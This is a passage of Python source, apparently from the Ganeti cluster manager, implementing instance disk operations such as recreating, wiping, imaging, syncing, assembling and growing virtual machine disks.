self.dont_collate_locks[locking.LEVEL_NODEGROUP] = True
self.dont_collate_locks[locking.LEVEL_NODE] = True
self.dont_collate_locks[locking.LEVEL_NODE_RES] = True
def DeclareLocks(self, level):
if level == locking.LEVEL_NODEGROUP:
assert self.op.iallocator is not None
assert not self.op.nodes
assert not self.needed_locks[locking.LEVEL_NODEGROUP]
self.share_locks[locking.LEVEL_NODEGROUP] = 1
# Lock the primary group used by the instance optimistically; this
# requires going via the node before it's locked, requiring
# verification later on
self.needed_locks[locking.LEVEL_NODEGROUP] = \
self.cfg.GetInstanceNodeGroups(self.op.instance_uuid, primary_only=True)
elif level == locking.LEVEL_NODE:
# If an allocator is used, then we lock all the nodes in the current
# instance group, as we don't know yet which ones will be selected;
# if we replace the nodes without using an allocator, locks are
# already declared in ExpandNames; otherwise, we need to lock all the
# instance nodes for disk re-creation
if self.op.iallocator:
assert not self.op.nodes
assert not self.needed_locks[locking.LEVEL_NODE]
assert len(self.owned_locks(locking.LEVEL_NODEGROUP)) == 1
# Lock member nodes of the group of the primary node
for group_uuid in self.owned_locks(locking.LEVEL_NODEGROUP):
self.needed_locks[locking.LEVEL_NODE].extend(
self.cfg.GetNodeGroup(group_uuid).members)
elif not self.op.nodes:
self._LockInstancesNodes(primary_only=False)
elif level == locking.LEVEL_NODE_RES:
# Copy node locks
self.needed_locks[locking.LEVEL_NODE_RES] = \
CopyLockList(self.needed_locks[locking.LEVEL_NODE])
def BuildHooksEnv(self):
"""Build hooks env.
This runs on master, primary and secondary nodes of the instance.
"""
return BuildInstanceHookEnvByObject(self, self.instance)
def BuildHooksNodes(self):
"""Build hooks nodes.
"""
nl = [self.cfg.GetMasterNode()] + \
list(self.cfg.GetInstanceNodes(self.instance.uuid))
return (nl, nl)
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster and is not running.
"""
instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
assert instance is not None, \
"Cannot retrieve locked instance %s" % self.op.instance_name
if self.op.node_uuids:
inst_nodes = self.cfg.GetInstanceNodes(instance.uuid)
if len(self.op.node_uuids) != len(inst_nodes):
raise errors.OpPrereqError("Instance %s currently has %d nodes, but"
" %d replacement nodes were specified" %
(instance.name, len(inst_nodes),
len(self.op.node_uuids)),
errors.ECODE_INVAL)
disks = self.cfg.GetInstanceDisks(instance.uuid)
assert (not utils.AnyDiskOfType(disks, [constants.DT_DRBD8]) or
len(self.op.node_uuids) == 2)
assert (not utils.AnyDiskOfType(disks, [constants.DT_PLAIN]) or
len(self.op.node_uuids) == 1)
primary_node = self.op.node_uuids[0]
else:
primary_node = instance.primary_node
if not self.op.iallocator:
CheckNodeOnline(self, primary_node)
if not instance.disks:
raise errors.OpPrereqError("Instance '%s' has no disks" %
self.op.instance_name, errors.ECODE_INVAL)
# Verify if node group locks are still correct
owned_groups = self.owned_locks(locking.LEVEL_NODEGROUP)
if owned_groups:
# Node group locks are acquired only for the primary node (and only
# when the allocator is used)
CheckInstanceNodeGroups(self.cfg, instance.uuid, owned_groups,
primary_only=True)
# if we replace nodes *and* the old primary is offline, we don't
# check the instance state
old_pnode = self.cfg.GetNodeInfo(instance.primary_node)
if not ((self.op.iallocator or self.op.node_uuids) and old_pnode.offline):
CheckInstanceState(self, instance, INSTANCE_NOT_RUNNING,
msg="cannot recreate disks")
if self.op.disks:
self.disks = dict(self.op.disks)
else:
self.disks = dict((idx, {}) for idx in range(len(instance.disks)))
maxidx = max(self.disks.keys())
if maxidx >= len(instance.disks):
raise errors.OpPrereqError("Invalid disk index '%s'" % maxidx,
errors.ECODE_INVAL)
if ((self.op.node_uuids or self.op.iallocator) and
sorted(self.disks.keys()) != range(len(instance.disks))):
raise errors.OpPrereqError("Can't recreate disks partially and"
" change the nodes at the same time",
errors.ECODE_INVAL)
self.instance = instance
if self.op.iallocator:
self._RunAllocator()
# Release unneeded node and node resource locks
ReleaseLocks(self, locking.LEVEL_NODE, keep=self.op.node_uuids)
ReleaseLocks(self, locking.LEVEL_NODE_RES, keep=self.op.node_uuids)
if self.op.node_uuids:
node_uuids = self.op.node_uuids
else:
node_uuids = self.cfg.GetInstanceNodes(instance.uuid)
excl_stor = compat.any(
rpc.GetExclusiveStorageForNodes(self.cfg, node_uuids).values()
)
for new_params in self.disks.values():
CheckSpindlesExclusiveStorage(new_params, excl_stor, False)
def Exec(self, feedback_fn):
"""Recreate the disks.
"""
assert (self.owned_locks(locking.LEVEL_NODE) ==
self.owned_locks(locking.LEVEL_NODE_RES))
to_skip = []
mods = [] # keeps track of needed changes
inst_disks = self.cfg.GetInstanceDisks(self.instance.uuid)
for idx, disk in enumerate(inst_disks):
try:
changes = self.disks[idx]
except KeyError:
# Disk should not be recreated
to_skip.append(idx)
continue
# update secondaries for disks, if needed
if self.op.node_uuids and disk.dev_type == constants.DT_DRBD8:
# need to update the nodes and minors
assert len(self.op.node_uuids) == 2
assert len(disk.logical_id) == 6 # otherwise disk internals
# have changed
(_, _, old_port, _, _, old_secret) = disk.logical_id
new_minors = self.cfg.AllocateDRBDMinor(self.op.node_uuids,
disk.uuid)
new_id = (self.op.node_uuids[0], self.op.node_uuids[1], old_port,
new_minors[0], new_minors[1], old_secret)
assert len(disk.logical_id) == len(new_id)
else:
new_id = None
mods.append((idx, new_id, changes))
# now that we have passed all asserts above, we can apply the mods
# in a single run (to avoid partial changes)
for idx, new_id, changes in mods:
disk = inst_disks[idx]
if new_id is not None:
assert disk.dev_type == constants.DT_DRBD8
disk.logical_id = new_id
if changes:
disk.Update(size=changes.get(constants.IDISK_SIZE, None),
mode=changes.get(constants.IDISK_MODE, None),
spindles=changes.get(constants.IDISK_SPINDLES, None))
self.cfg.Update(disk, feedback_fn)
# change primary node, if needed
if self.op.node_uuids:
self.LogWarning("Changing the instance's nodes, you will have to"
" remove any disks left on the older nodes manually")
self.instance.primary_node = self.op.node_uuids[0]
self.cfg.Update(self.instance, feedback_fn)
for disk in inst_disks:
self.cfg.SetDiskNodes(disk.uuid, self.op.node_uuids)
# All touched nodes must be locked
mylocks = self.owned_locks(locking.LEVEL_NODE)
inst_nodes = self.cfg.GetInstanceNodes(self.instance.uuid)
assert mylocks.issuperset(frozenset(inst_nodes))
new_disks = CreateDisks(self, self.instance, to_skip=to_skip)
# TODO: Release node locks before wiping, or explain why it's not possible
inst_disks = self.cfg.GetInstanceDisks(self.instance.uuid)
if self.cfg.GetClusterInfo().prealloc_wipe_disks:
wipedisks = [(idx, disk, 0)
for (idx, disk) in enumerate(inst_disks)
if idx not in to_skip]
WipeOrCleanupDisks(self, self.instance, disks=wipedisks,
cleanup=new_disks)
def _PerformNodeInfoCall(lu, node_uuids, vg):
"""Prepares the input and performs a node info call.
@type lu: C{LogicalUnit}
@param lu: a logical unit from which we get configuration data
@type node_uuids: list of string
@param node_uuids: list of node UUIDs to perform the call for
@type vg: string
@param vg: the volume group's name
"""
lvm_storage_units = [(constants.ST_LVM_VG, vg)]
storage_units = rpc.PrepareStorageUnitsForNodes(lu.cfg, lvm_storage_units,
node_uuids)
hvname = lu.cfg.GetHypervisorType()
hvparams = lu.cfg.GetClusterInfo().hvparams
nodeinfo = lu.rpc.call_node_info(node_uuids, storage_units,
[(hvname, hvparams[hvname])])
return nodeinfo
def _CheckVgCapacityForNode(node_name, node_info, vg, requested):
"""Checks the vg capacity for a given node.
@type node_info: tuple (_, list of dicts, _)
@param node_info: the result of the node info call for one node
@type node_name: string
@param node_name: the name of the node
@type vg: string
@param vg: volume group name
@type requested: int
@param requested: the amount of disk in MiB to check for
@raise errors.OpPrereqError: if the node doesn't have enough disk,
or we cannot check the node
"""
(_, space_info, _) = node_info
lvm_vg_info = utils.storage.LookupSpaceInfoByStorageType(
space_info, constants.ST_LVM_VG)
if not lvm_vg_info:
raise errors.OpPrereqError("Can't retrieve storage information for LVM",
errors.ECODE_ENVIRON)
vg_free = lvm_vg_info.get("storage_free", None)
if not isinstance(vg_free, int):
raise errors.OpPrereqError("Can't compute free disk space on node"
" %s for vg %s, result was '%s'" %
(node_name, vg, vg_free), errors.ECODE_ENVIRON)
if requested > vg_free:
raise errors.OpPrereqError("Not enough disk space on target node %s"
" vg %s: required %d MiB, available %d MiB" %
(node_name, vg, requested, vg_free),
errors.ECODE_NORES)
def _CheckNodesFreeDiskOnVG(lu, node_uuids, vg, requested):
"""Checks if nodes have enough free disk space in the specified VG.
This function checks if all given nodes have the needed amount of
free disk. In case any node has less disk or we cannot get the
information from the node, this function raises an OpPrereqError
exception.
@type lu: C{LogicalUnit}
@param lu: a logical unit from which we get configuration data
@type node_uuids: C{list}
@param node_uuids: the list of node UUIDs to check
@type vg: C{str}
@param vg: the volume group to check
@type requested: C{int}
@param requested: the amount of disk in MiB to check for
@raise errors.OpPrereqError: if the node doesn't have enough disk,
or we cannot check the node
"""
nodeinfo = _PerformNodeInfoCall(lu, node_uuids, vg)
for node_uuid in node_uuids:
node_name = lu.cfg.GetNodeName(node_uuid)
info = nodeinfo[node_uuid]
info.Raise("Cannot get current information from node %s" % node_name,
prereq=True, ecode=errors.ECODE_ENVIRON)
_CheckVgCapacityForNode(node_name, info.payload, vg, requested)
def CheckNodesFreeDiskPerVG(lu, node_uuids, req_sizes):
"""Checks if nodes have enough free disk space in all the VGs.
This function checks if all given nodes have the needed amount of
free disk. In case any node has less disk or we cannot get the
information from the node, this function raises an OpPrereqError
exception.
@type lu: C{LogicalUnit}
@param lu: a logical unit from which we get configuration data
@type node_uuids: C{list}
@param node_uuids: the list of node UUIDs to check
@type req_sizes: C{dict}
@param req_sizes: the hash of vg and corresponding amount of disk in
MiB to check for
@raise errors.OpPrereqError: if the node doesn't have enough disk,
or we cannot check the node
"""
for vg, req_size in req_sizes.items():
_CheckNodesFreeDiskOnVG(lu, node_uuids, vg, req_size)
def _DiskSizeInBytesToMebibytes(lu, size):
"""Converts a disk size in bytes to mebibytes.
Warns and rounds up if the size isn't an even multiple of 1 MiB.
"""
(mib, remainder) = divmod(size, 1024 * 1024)
if remainder != 0:
lu.LogWarning("Disk size is not an even multiple of 1 MiB; rounding up"
" to not overwrite existing data (%s bytes will not be"
" wiped)", (1024 * 1024) - remainder)
mib += 1
return mib
def _CalcEta(time_taken, written, total_size):
"""Calculates the ETA based on size written and total size.
@param time_taken: The time taken so far
@param written: amount written so far
@param total_size: The total size of data to be written
@return: The remaining time in seconds
"""
avg_time = time_taken / float(written)
return (total_size - written) * avg_time
def WipeDisks(lu, instance, disks=None):
"""Wipes instance disks.
@type lu: L{LogicalUnit}
@param lu: the logical unit on whose behalf we execute
@type instance: L{objects.Instance}
@param instance: the instance whose disks we should create
@type disks: None or list of tuple of (number, L{objects.Disk}, number)
@param disks: Disk details; tuple contains disk index, disk object and the
start offset
"""
node_uuid = instance.primary_node
node_name = lu.cfg.GetNodeName(node_uuid)
if disks is None:
inst_disks = lu.cfg.GetInstanceDisks(instance.uuid)
disks = [(idx, disk, 0)
for (idx, disk) in enumerate(inst_disks)]
logging.info("Pausing synchronization of disks of instance '%s'",
instance.name)
result = lu.rpc.call_blockdev_pause_resume_sync(node_uuid,
(map(compat.snd, disks),
instance),
True)
result.Raise("Failed to pause disk synchronization on node '%s'" % node_name)
for idx, success in enumerate(result.payload):
if not success:
logging.warn("Pausing synchronization of disk %s of instance '%s'"
" failed", idx, instance.name)
try:
for (idx, device, offset) in disks:
# The wipe size is MIN_WIPE_CHUNK_PERCENT % of the instance disk but
# MAX_WIPE_CHUNK at max. Truncating to integer to avoid rounding errors.
wipe_chunk_size = \
int(min(constants.MAX_WIPE_CHUNK,
device.size / 100.0 * constants.MIN_WIPE_CHUNK_PERCENT))
size = device.size
last_output = 0
start_time = time.time()
if offset == 0:
info_text = ""
else:
info_text = (" (from %s to %s)" %
(utils.FormatUnit(offset, "h"),
utils.FormatUnit(size, "h")))
lu.LogInfo("* Wiping disk %s%s", idx, info_text)
logging.info("Wiping disk %d for instance %s on node %s using"
" chunk size %s", idx, instance.name, node_name,
wipe_chunk_size)
while offset < size:
wipe_size = min(wipe_chunk_size, size - offset)
logging.debug("Wiping disk %d, offset %s, chunk %s",
idx, offset, wipe_size)
result = lu.rpc.call_blockdev_wipe(node_uuid, (device, instance),
offset, wipe_size)
result.Raise("Could not wipe disk %d at offset %d for size %d" %
(idx, offset, wipe_size))
now = time.time()
offset += wipe_size
if now - last_output >= 60:
eta = _CalcEta(now - start_time, offset, size)
lu.LogInfo(" - done: %.1f%% ETA: %s",
offset / float(size) * 100, utils.FormatSeconds(eta))
last_output = now
finally:
logging.info("Resuming synchronization of disks for instance '%s'",
instance.name)
result = lu.rpc.call_blockdev_pause_resume_sync(node_uuid,
(map(compat.snd, disks),
instance),
False)
if result.fail_msg:
lu.LogWarning("Failed to resume disk synchronization on node '%s': %s",
node_name, result.fail_msg)
else:
for idx, success in enumerate(result.payload):
if not success:
lu.LogWarning("Resuming synchronization of disk %s of instance '%s'"
" failed", idx, instance.name)
def ImageDisks(lu, instance, image, disks=None):
"""Dumps an image onto an instance disk.
@type lu: L{LogicalUnit}
@param lu: the logical unit on whose behalf we execute
@type instance: L{objects.Instance}
@param instance: the instance whose disks we should create
@type image: string
@param image: the image whose disks we should create
@type disks: None or list of ints
@param disks: disk indices
"""
node_uuid = instance.primary_node
node_name = lu.cfg.GetNodeName(node_uuid)
inst_disks = lu.cfg.GetInstanceDisks(instance.uuid)
if disks is None:
disks = [(0, inst_disks[0])]
else:
disks = [(idx, inst_disks[idx]) for idx in disks]
logging.info("Pausing synchronization of disks of instance '%s'",
instance.name)
result = lu.rpc.call_blockdev_pause_resume_sync(node_uuid,
(map(compat.snd, disks),
instance),
True)
result.Raise("Failed to pause disk synchronization on node '%s'" % node_name)
for idx, success in enumerate(result.payload):
if not success:
logging.warn("Pausing synchronization of disk %s of instance '%s'"
" failed", idx, instance.name)
try:
for (idx, device) in disks:
lu.LogInfo("Imaging disk '%d' for instance '%s' on node '%s'",
idx, instance.name, node_name)
result = lu.rpc.call_blockdev_image(node_uuid, (device, instance),
image, device.size)
result.Raise("Could not image disk '%d' for instance '%s' on node '%s'" %
(idx, instance.name, node_name))
finally:
logging.info("Resuming synchronization of disks for instance '%s'",
instance.name)
result = lu.rpc.call_blockdev_pause_resume_sync(node_uuid,
(map(compat.snd, disks),
instance),
False)
if result.fail_msg:
lu.LogWarning("Failed to resume disk synchronization for instance '%s' on"
" node '%s'", node_name, result.fail_msg)
else:
for idx, success in enumerate(result.payload):
if not success:
lu.LogWarning("Failed to resume synchronization of disk '%d' of"
" instance '%s'", idx, instance.name)
def WipeOrCleanupDisks(lu, instance, disks=None, cleanup=None):
"""Wrapper for L{WipeDisks} that handles errors.
@type lu: L{LogicalUnit}
@param lu: the logical unit on whose behalf we execute
@type instance: L{objects.Instance}
@param instance: the instance whose disks we should wipe
@param disks: see L{WipeDisks}
@param cleanup: the result returned by L{CreateDisks}, used for cleanup in
case of error
@raise errors.OpPrereqError: in case of failure
"""
try:
WipeDisks(lu, instance, disks=disks)
except errors.OpExecError:
logging.warning("Wiping disks for instance '%s' failed",
instance.name)
_UndoCreateDisks(lu, cleanup, instance)
raise
def ExpandCheckDisks(instance_disks, disks):
"""Return the instance disks selected by the disks list
@type disks: list of L{objects.Disk} or None
@param disks: selected disks
@rtype: list of L{objects.Disk}
@return: selected instance disks to act on
"""
if disks is None:
return instance_disks
else:
inst_disks_uuids = [d.uuid for d in instance_disks]
disks_uuids = [d.uuid for d in disks]
if not set(disks_uuids).issubset(inst_disks_uuids):
raise errors.ProgrammerError("Can only act on disks belonging to the"
" target instance: expected a subset of %s,"
" got %s" % (inst_disks_uuids, disks_uuids))
return disks
def WaitForSync(lu, instance, disks=None, oneshot=False):
"""Sleep and poll for an instance's disk to sync.
"""
inst_disks = lu.cfg.GetInstanceDisks(instance.uuid)
if not inst_disks or disks is not None and not disks:
return True
disks = [d for d in ExpandCheckDisks(inst_disks, disks)
if d.dev_type in constants.DTS_INT_MIRROR]
if not oneshot:
lu.LogInfo("Waiting for instance %s to sync disks", instance.name)
node_uuid = instance.primary_node
node_name = lu.cfg.GetNodeName(node_uuid)
# TODO: Convert to utils.Retry
retries = 0
degr_retries = 10 # in seconds, as we sleep 1 second each time
while True:
max_time = 0
done = True
cumul_degraded = False
rstats = lu.rpc.call_blockdev_getmirrorstatus(node_uuid, (disks, instance))
msg = rstats.fail_msg
if msg:
lu.LogWarning("Can't get any data from node %s: %s", node_name, msg)
retries += 1
if retries >= 10:
raise errors.RemoteError("Can't contact node %s for mirror data,"
" aborting." % node_name)
time.sleep(6)
continue
rstats = rstats.payload
retries = 0
for i, mstat in enumerate(rstats):
if mstat is None:
lu.LogWarning("Can't compute data for node %s/%s",
node_name, disks[i].iv_name)
continue
cumul_degraded = (cumul_degraded or
(mstat.is_degraded and mstat.sync_percent is None))
if mstat.sync_percent is not None:
done = False
if mstat.estimated_time is not None:
rem_time = ("%s remaining (estimated)" %
utils.FormatSeconds(mstat.estimated_time))
max_time = mstat.estimated_time
else:
rem_time = "no time estimate"
max_time = 5 # sleep at least a bit between retries
lu.LogInfo("- device %s: %5.2f%% done, %s",
disks[i].iv_name, mstat.sync_percent, rem_time)
# if we're done but degraded, let's do a few small retries, to
# make sure we see a stable and not transient situation; therefore
# we force restart of the loop
if (done or oneshot) and cumul_degraded and degr_retries > 0:
logging.info("Degraded disks found, %d retries left", degr_retries)
degr_retries -= 1
time.sleep(1)
continue
if done or oneshot:
break
time.sleep(min(60, max_time))
if done:
lu.LogInfo("Instance %s's disks are in sync", instance.name)
return not cumul_degraded
def ShutdownInstanceDisks(lu, instance, disks=None, ignore_primary=False):
"""Shutdown block devices of an instance.
This does the shutdown on all nodes of the instance.
If the ignore_primary is false, errors on the primary node are
ignored.
Modifies the configuration of the instance, so the caller should re-read the
instance configuration, if needed.
"""
all_result = True
if disks is None:
# only mark instance disks as inactive if all disks are affected
lu.cfg.MarkInstanceDisksInactive(instance.uuid)
inst_disks = lu.cfg.GetInstanceDisks(instance.uuid)
disks = ExpandCheckDisks(inst_disks, disks)
for disk in disks:
for node_uuid, top_disk in disk.ComputeNodeTree(instance.primary_node):
result = lu.rpc.call_blockdev_shutdown(node_uuid, (top_disk, instance))
msg = result.fail_msg
if msg:
lu.LogWarning("Could not shutdown block device %s on node %s: %s",
disk.iv_name, lu.cfg.GetNodeName(node_uuid), msg)
if ((node_uuid == instance.primary_node and not ignore_primary) or
(node_uuid != instance.primary_node and not result.offline)):
all_result = False
return all_result
def _SafeShutdownInstanceDisks(lu, instance, disks=None, req_states=None):
"""Shutdown block devices of an instance.
This function checks if an instance is running, before calling
_ShutdownInstanceDisks.
"""
if req_states is None:
req_states = INSTANCE_DOWN
CheckInstanceState(lu, instance, req_states, msg="cannot shutdown disks")
ShutdownInstanceDisks(lu, instance, disks=disks)
def AssembleInstanceDisks(lu, instance, disks=None, ignore_secondaries=False,
ignore_size=False):
"""Prepare the block devices for an instance.
This sets up the block devices on all nodes.
Modifies the configuration of the instance, so the caller should re-read the
instance configuration, if needed.
@type lu: L{LogicalUnit}
@param lu: the logical unit on whose behalf we execute
@type instance: L{objects.Instance}
@param instance: the instance for whose disks we assemble
@type disks: list of L{objects.Disk} or None
@param disks: which disks to assemble (or all, if None)
@type ignore_secondaries: boolean
@param ignore_secondaries: if true, errors on secondary nodes
won't result in an error return from the function
@type ignore_size: boolean
@param ignore_size: if true, the current known size of the disk
will not be used during the disk activation, useful for cases
when the size is wrong
@return: False if the operation failed, otherwise a list of
(host, instance_visible_name, node_visible_name)
with the mapping from node devices to instance devices, as well as the
payloads of the RPC calls
"""
device_info = []
disks_ok = True
payloads = []
if disks is None:
# only mark instance disks as active if all disks are affected
instance = lu.cfg.MarkInstanceDisksActive(instance.uuid)
inst_disks = lu.cfg.GetInstanceDisks(instance.uuid)
disks = ExpandCheckDisks(inst_disks, disks)
# With the two passes mechanism we try to reduce the window of
# opportunity for the race condition of switching DRBD to primary
# before handshaking occured, but we do not eliminate it
# The proper fix would be to wait (with some limits) until the
# connection has been made and drbd transitions from WFConnection
# into any other network-connected state (Connected, SyncTarget,
# SyncSource, etc.)
# 1st pass, assemble on all nodes in secondary mode
for idx, inst_disk in enumerate(disks):
for node_uuid, node_disk in inst_disk.ComputeNodeTree(
instance.primary_node):
if ignore_size:
node_disk = node_disk.Copy()
node_disk.UnsetSize()
result = lu.rpc.call_blockdev_assemble(node_uuid, (node_disk, instance),
instance, False, idx)
msg = result.fail_msg
if msg:
secondary_nodes = lu.cfg.GetInstanceSecondaryNodes(instance.uuid)
is_offline_secondary = (node_uuid in secondary_nodes and
result.offline)
lu.LogWarning("Could not prepare block device %s on node %s"
" (is_primary=False, pass=1): %s",
inst_disk.iv_name, lu.cfg.GetNodeName(node_uuid), msg)
if not (ignore_secondaries or is_offline_secondary):
disks_ok = False
# FIXME: race condition on drbd migration to primary
# 2nd pass, do only the primary node
for idx, inst_disk in enumerate(disks):
dev_path = None
for node_uuid, node_disk in inst_disk.ComputeNodeTree(
instance.primary_node):
if node_uuid != instance.primary_node:
continue
if ignore_size:
node_disk = node_disk.Copy()
node_disk.UnsetSize()
result = lu.rpc.call_blockdev_assemble(node_uuid, (node_disk, instance),
instance, True, idx)
payloads.append(result.payload)
msg = result.fail_msg
if msg:
lu.LogWarning("Could not prepare block device %s on node %s"
" (is_primary=True, pass=2): %s",
inst_disk.iv_name, lu.cfg.GetNodeName(node_uuid), msg)
disks_ok = False
else:
dev_path, _, __ = result.payload
device_info.append((lu.cfg.GetNodeName(instance.primary_node),
inst_disk.iv_name, dev_path))
if not disks_ok:
lu.cfg.MarkInstanceDisksInactive(instance.uuid)
return disks_ok, device_info, payloads
def StartInstanceDisks(lu, instance, force):
"""Start the disks of an instance.
Modifies the configuration of the instance, so the caller should re-read the
instance configuration, if needed.
"""
disks_ok, _, _ = AssembleInstanceDisks(lu, instance,
ignore_secondaries=force)
if not disks_ok:
ShutdownInstanceDisks(lu, instance)
if force is not None and not force:
lu.LogWarning("",
hint=("If the message above refers to a secondary node,"
" you can retry the operation using '--force'"))
raise errors.OpExecError("Disk consistency error")
class LUInstanceGrowDisk(LogicalUnit):
"""Grow a disk of an instance.
"""
HPATH = "disk-grow"
HTYPE = constants.HTYPE_INSTANCE
REQ_BGL = False
def ExpandNames(self):
self._ExpandAndLockInstance()
self.needed_locks[locking.LEVEL_NODE] = []
self.needed_locks[locking.LEVEL_NODE_RES] = []
self.recalculate_locks[locking.LEVEL_NODE] = constants.LOCKS_REPLACE
self.recalculate_locks[locking.LEVEL_NODE_RES] = constants.LOCKS_REPLACE
self.dont_collate_locks[locking.LEVEL_NODE] = True
self.dont_collate_locks[locking.LEVEL_NODE_RES] = True
def DeclareLocks(self, level):
if level == locking.LEVEL_NODE:
self._LockInstancesNodes()
elif level == locking.LEVEL_NODE_RES:
# Copy node locks
self.needed_locks[locking.LEVEL_NODE_RES] = \
CopyLockList(self.needed_locks[locking.LEVEL_NODE])
def BuildHooksEnv(self):
"""Build hooks env.
This runs on the master, the primary and all the secondaries.
"""
env = {
"DISK": self.op.disk,
"AMOUNT": self.op.amount,
"ABSOLUTE": self.op.absolute,
}
env.update(BuildInstanceHookEnvByObject(self, self.instance))
return env
def BuildHooksNodes(self):
"""Build hooks nodes.
"""
nl = [self.cfg.GetMasterNode()] + \
list(self.cfg.GetInstanceNodes(self.instance.uuid))
return (nl, nl)
def CheckPrereq(self):
"""Check prerequisites.
This checks that the instance is in the cluster.
"""
self.instance = self.cfg.GetInstanceInfo(self.op.instance_uuid)
assert self.instance is not None, \
"Cannot retrieve locked instance %s" % self.op.instance_name
node_uuids = list(self.cfg.GetInstanceNodes(self.instance.uuid))
for node_uuid in node_uuids:
CheckNodeOnline(self, node_uuid)
self.node_es_flags = rpc.GetExclusiveStorageForNodes(self.cfg, node_uuids)
self.disk = self.cfg.GetDiskInfo(self.instance.FindDisk(self.op.disk))
if self.disk.dev_type not in constants.DTS_GROWABLE:
raise errors.OpPrereqError(
"Instance's disk layout %s does not support"
" growing" % self.disk.dev_type, errors.ECODE_INVAL)
if self.op.absolute:
self.target = self.op.amount
self.delta = self.target - self.disk.size
if self.delta < 0:
raise errors.OpPrereqError("Requested size (%s) is smaller than "
"current disk size (%s)" %
(utils.FormatUnit(self.target, "h"),
utils.FormatUnit(self.disk.size, "h")),
errors.ECODE_STATE)
else:
self.delta = self.op.amount
self.target = self.disk.size + self.delta
if self.delta < 0:
raise errors.OpPrereqError("Requested increment (%s) is negative" %
utils.FormatUnit(self.delta, "h"),
errors.ECODE_INVAL)
self._CheckDiskSpace(node_uuids, self.disk.ComputeGrowth(self.delta))
self._CheckIPolicy(self.target)
def _CheckDiskSpace(self, node_uuids, req_vgspace):
template = self.disk.dev_type
if (template not in constants.DTS_NO_FREE_SPACE_CHECK and
not any(self.node_es_flags.values())):
# TODO: check the free disk space for file, when that feature will be
# supported
# With exclusive storage we need to do something smarter than just looking
# at free space, which, in the end, is basically a dry run. So we rely on
# the dry run performed in Exec() instead.
CheckNodesFreeDiskPerVG(self, node_uuids, req_vgspace)
def _CheckIPolicy(self, target_size):
cluster = self.cfg.GetClusterInfo()
group_uuid = list(self.cfg.GetInstanceNodeGroups(self.op.instance_uuid,
primary_only=True))[0]
group_info = self.cfg.GetNodeGroup(group_uuid)
ipolicy = ganeti.masterd.instance.CalculateGroupIPolicy(cluster,
group_info)
disks = self.cfg.GetInstanceDisks(self.op.instance_uuid)
disk_sizes = [disk.size if disk.uuid != self.disk.uuid else target_size
for disk in disks]
# The ipolicy checker below ignores None, so we only give it the disk size
res = ComputeIPolicyDiskSizesViolation(ipolicy, disk_sizes, disks)
if res:
msg = ("Growing disk %s violates policy: %s" %
(self.op.disk,
utils.CommaJoin(res)))
if self.op.ignore_ipolicy:
self.LogWarning(msg)
else:
raise errors.OpPrereqError(msg, errors.ECODE_INVAL)
def Exec(self, feedback_fn):
"""Execute disk grow.
"""
assert set([self.instance.name]) == self.owned_locks(locking.LEVEL_INSTANCE)
assert (self.owned_locks(locking.LEVEL_NODE) ==
self.owned_locks(locking.LEVEL_NODE_RES))
wipe_disks = self.cfg.GetClusterInfo().prealloc_wipe_disks
disks_ok, _, _ = AssembleInstanceDisks(self, self.instance,
disks=[self.disk])
if not disks_ok:
raise errors.OpExecError("Cannot activate block device to grow")
feedback_fn("Growing disk %s of instance '%s' by %s to %s" %
(self.op.disk, self.instance.name,
utils.FormatUnit(self.delta, "h"),
utils.FormatUnit(self.target, "h")))
# First run all grow ops in dry-run mode
inst_nodes = self.cfg.GetInstanceNodes(self.instance.uuid)
for node_uuid in inst_nodes:
result = self.rpc.call_blockdev_grow(node_uuid,
(self.disk, self.instance),
self.delta, True, True,
self.node_es_flags[node_uuid])
result.Raise("Dry-run grow request failed to node %s" %
self.cfg.GetNodeName(node_uuid))
if wipe_disks:
# Get disk size from primary node for wiping
result = self.rpc.call_blockdev_getdimensions(
self.instance.primary_node, [([self.disk], self.instance)])
result.Raise("Failed to retrieve disk size from node '%s'" %
self.instance.primary_node)
(disk_dimensions, ) = result.payload
if disk_dimensions is None:
raise errors.OpExecError("Failed to retrieve disk size from primary"
" node '%s'" % self.instance.primary_node)
(disk_size_in_bytes, _) = disk_dimensions
old_disk_size = _DiskSizeInBytesToMebibytes(self, disk_size_in_bytes)
assert old_disk_size >= self.disk.size, \
("Retrieved disk size too small (got %s, should be at least %s)" %
(old_disk_size, self.disk.size))
else:
old_disk_size = None
# We know that (as far as we can test) operations across different
# nodes will succeed, time to run it for real on the backing storage
for node_uuid in inst_nodes:
result = self.rpc.call_blockdev_grow(node_uuid,
(self.disk, self.instance),
self.delta, False, True,
self.node_es_flags[node_uuid])
result.Raise("Grow request failed to node %s" %
self.cfg.GetNodeName(node_uuid))
# And now execute it for logical storage, on the primary node
node_uuid = self.instance.primary_node
result = self.rpc.call_blockdev_grow(node_uuid, (self.disk, self.instance),
self.delta, False, False,
self.node_es_flags[node_uuid])
result.Raise("Grow request failed to node %s" %
self.cfg.GetNodeName(node_uuid))
self.disk.RecordGrow(self.delta)
self.cfg.Update(self.instance, feedback_fn)
self.cfg.Update(self.disk, feedback_fn)
# Changes have been recorded, release node lock
ReleaseLocks(self, locking.LEVEL_NODE)
# Downgrade lock while waiting for sync
self.WConfdClient().DownGradeLocksLevel(
locking.LEVEL_NAMES[locking.LEVEL_INSTANCE])
assert wipe_disks ^ (old_disk_size is None)
if wipe_disks:
inst_disks = self.cfg.GetInstanceDisks(self.instance.uuid)
assert inst_disks[self.op.disk] == self.disk
# Wipe newly added disk space
WipeDisks(self, self.instance,
disks=[(self.op.disk, self.disk, old_disk_size)])
if self.op.wait_for_sync:
disk_abort = not WaitForSync(self, self.instance, disks=[self.disk])
if disk_abort:
self.LogWarning("Disk syncing has not returned a good status; check"
" the instance")
if not self.instance.disks_active:
_SafeShutdownInstanceDisks(self, self.instance, disks=[self.disk])
elif not self.instance.disks_active:
self.LogWarning("Not shutting down the disk even if the instance is"
" not supposed to be running because no wait for"
" sync mode was requested")
assert self.owned_locks(locking.LEVEL_NODE_RES)
assert set([self.instance.name]) == self.owned_locks(locking.LEVEL_INSTANCE)
class LUInstanceReplaceDisks(LogicalUnit):
"""Replace the disks of an instance.
"""
HPATH = "mirrors-replace"
HTYPE = constants.HTYPE_INSTANCE
REQ_BGL = False
def CheckArguments(self):
"""Check arguments.
"""
if self.op.mode == constants.REPLACE_DISK_CHG:
if self.op.remote_node is None and self.op.iallocator is None:
raise errors.OpPrereqError("When changing the secondary either an"
" iallocator script must be used or the"
" new node given", errors.ECODE_INVAL)
else:
CheckIAllocatorOrNode(self, "iallocator", "remote_node")
elif self.op.remote_node is not None or self.op.iallocator is not None:
# Not replacing the secondary
